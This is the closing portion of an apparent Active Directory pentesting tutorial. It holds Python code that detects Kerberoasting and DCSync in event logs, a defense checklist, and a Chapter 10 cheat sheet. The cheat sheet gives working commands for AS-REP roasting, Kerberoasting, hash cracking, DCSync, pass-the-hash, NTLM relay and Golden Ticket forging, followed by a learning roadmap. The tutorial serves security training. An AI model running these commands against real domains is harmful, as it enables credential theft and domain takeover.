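SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    *[_tgs("john@CORP.LOCAL", s, RC4_HMAC, "::ffff:192.168.56.20")
      for s in ("svc_sql", "svc_web", "svc_backup", "svc_sccm",
                "svc_exch", "svc_ftp", "svc_mon")],
    _tgs("alice@CORP.LOCAL", "svc_sql", "0x12", "::ffff:192.168.56.11"),  # AES256: normal
    _tgs("alice@CORP.LOCAL", "WS01$", RC4_HMAC, "::ffff:192.168.56.11"),  # host SPN: ignored
    _objaccess("DC01$", REPL_PROPS),   # a DC replicating: normal
    _objaccess("john", REPL_PROPS),    # a user replicating: DCSync
])


def parse_events(text):
    """Yield one event dict per non-empty JSON line."""
    for line in text.splitlines():
        if line.strip():
            yield json.loads(line)


def is_roast_candidate(ev):
    """Successful RC4 service-ticket request for a user SPN.
    Computer accounts (name ends in $) and krbtgt are excluded as noise."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventCode") == 4769
            and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoasting(text, threshold=5):
    """Accounts that obtained more than `threshold` distinct RC4 service tickets.
    Returns {account: sorted service names} for each offender."""
    services = defaultdict(set)
    for ev in parse_events(text):
        if is_roast_candidate(ev):
            services[ev["TargetUserName"]].add(ev["ServiceName"])
    return {acct: sorted(svcs) for acct, svcs in services.items()
            if len(svcs) > threshold}


def detect_dcsync(text, dc_accounts=("DC01$",)):
    """4662 events where a principal other than a known DC used replication rights.
    Returns [(subject, sorted matched GUIDs)]; dc_accounts is the lab's DC list (assumed)."""
    hits = []
    for ev in parse_events(text):
        if ev.get("EventCode") != 4662:
            continue
        guids = {g.strip("{}").lower() for g in ev.get("Properties", "").split()}
        matched = guids & DCSYNC_GUIDS
        if matched and ev.get("SubjectUserName") not in dc_accounts:
            hits.append((ev["SubjectUserName"], sorted(matched)))
    return hits


if __name__ == "__main__":
    for acct, svcs in detect_kerberoasting(SAMPLE_LOG).items():
        print(f"[Kerberoast?] {acct} got RC4 tickets for {len(svcs)} services: {', '.join(svcs)}")
    for subject, guids in detect_dcsync(SAMPLE_LOG):
        print(f"[DCSync?] {subject} used replication rights: {', '.join(guids)}")
```

Unlike the Splunk query, which counts per account-and-service pair, this counts distinct services per account, the shape an automated Kerberoast run leaves in the log.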

🛡️ Defense: Remember

  • ✅ Event 4769 + RC4 → Kerberoast | Event 4662 → DCSync
  • ✅ LLMNR/NBT-NS off → NTLM Relay blocked
  • ✅ Tiered Model → the DA account is used only on DCs
  • ✅ Managed Service Account → automatic passwords, Kerberoast is hard
CHAPTER 10
📋 Cheat Sheet & Roadmap
All important commands and the path to becoming an AD pentester

⚡ Quick Attack Commands

🔍 Enumeration
bloodhound-python -d corp.local -u user -p pass -c All      # BloodHound collect
Get-NetUser -SPN                                           # Kerberoast targets
Get-NetUser -PreauthNotRequired                            # AS-REP targets
Find-InterestingDomainAcl -ResolveGUIDs                    # ACL abuse
crackmapexec smb 192.168.56.0/24 -u user -p pass           # Network sweep

🎫 Kerberos
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass    # AS-REP Roast
GetUserSPNs.py corp.local/user:pass -request               # Kerberoast
hashcat -m 18200 asrep.txt rockyou.txt                     # AS-REP crack
hashcat -m 13100 kerb.txt rockyou.txt                      # TGS crack
.\Rubeus.exe kerberoast /outfile:k.txt                     # Rubeus Kerberoast

🔑 Credentials
secretsdump.py corp/Admin:Pass@dc01                        # DCSync
secretsdump.py corp/Admin@dc01 -hashes :HASH               # DCSync PTH
pypykatz lsa minidump lsass.dmp                            # LSASS parse
crackmapexec smb IP -u Admin -H HASH --ntds                # NTDS dump
ntlmrelayx.py -tf targets.txt -smb2support                 # NTLM Relay

🌐 Lateral Movement
psexec.py corp/Admin@192.168.56.11 -hashes :HASH           # PSExec PTH
wmiexec.py corp/Admin@192.168.56.11 -hashes :HASH          # WMIExec
evil-winrm -i IP -u Admin -H HASH                          # WinRM PTH
crackmapexec smb IP -u Admin -H HASH -x "whoami"           # CME execute
Invoke-Command -ComputerName WS01 -ScriptBlock {whoami}    # PS Remoting

👑 Domain Compromise Commands

# ═══ AS-REP Roast ═══
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.56.10
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# ═══ Kerberoast ═══
GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request -outputfile kerb.txt
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt

# ═══ Pass-the-Hash ═══
crackmapexec smb 192.168.56.0/24 -u Administrator -H NTLM_HASH --continue-on-success
evil-winrm -i 192.168.56.10 -u Administrator -H NTLM_HASH

# ═══ DCSync ═══
secretsdump.py corp.local/Administrator:Admin123@192.168.56.10 -just-dc-ntlm

# ═══ Golden Ticket ═══
# 1. Get the KRBTGT hash (from DCSync)
# 2. Domain SID:
lookupsid.py corp.local/john:Pass123@dc01.corp.local 0
# 3. Create the Golden Ticket:
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local -duration 3650 godmode
export KRB5CCNAME=godmode.ccache
secretsdump.py -k -no-pass corp.local/godmode@dc01.corp.local

🗺️ AD Pentester Roadmap

🪟 Phase 1 — Windows Foundation (1-2 months)
Without knowing Windows OS internals, Active Directory concepts, and PowerShell, AD attacks are hard to understand.
Topics: Windows Internals, PowerShell basics, AD Architecture, Kerberos protocol, SMB and NTLM basics

🔧 Phase 2 — Build a Lab (1 week)
Build your own lab with Vulnerable-AD; you can't learn this without hands-on practice.
Topics: Windows Server VM, Vulnerable-AD script, Kali + impacket, BloodHound setup

⚔️ Phase 3 — Core Attacks (2-3 months)
Without Kerberoast, PTH, and BloodHound, an AD pentest is incomplete.
Topics: AS-REP Roasting, Kerberoasting, Pass-the-Hash, BloodHound paths, NTLM Relay

👑 Phase 4 — Advanced & Domain Compromise (2-3 months)
ACL abuse, DCSync, Golden Ticket, CVE exploitation: full domain control.
Topics: ACL abuse, DCSync, Golden Ticket, Delegation attacks, GOAD lab

🏆 Phase 5 — Certification & Career (ongoing)
CRTP → CRTE → CRTO → OSCP: the AD-focused certification path.
Topics: CRTP (Altered Security), CRTE, CRTO (Zero-Point), OSCP, HackTheBox Pro Labs

📚 Best Resources

Resource | Type | Topic
HackTheBox Pro Labs: RastaLabs | Lab | Real AD environment practice
GOAD (Game of AD) | Lab | Vulnerable AD home lab
TryHackMe — Holo / Throwback | Lab | AD-focused learning paths
CRTP Course (Nikhil Mittal) | Course | AD attack lab + cert
ired.team | Notes | Best free AD attack notes
S1ren / TCM Security | YouTube | Free AD course
BloodHound Docs | Docs | BloodHound usage
impacket GitHub | Tool | All AD Python tools

🏰 "In Active Directory, every misconfiguration is a path to Domain Admin."

This document is entirely for educational purposes. Always practice in an authorized lab or pentest environment.

v1.0 — Active Directory Attack | Bilingual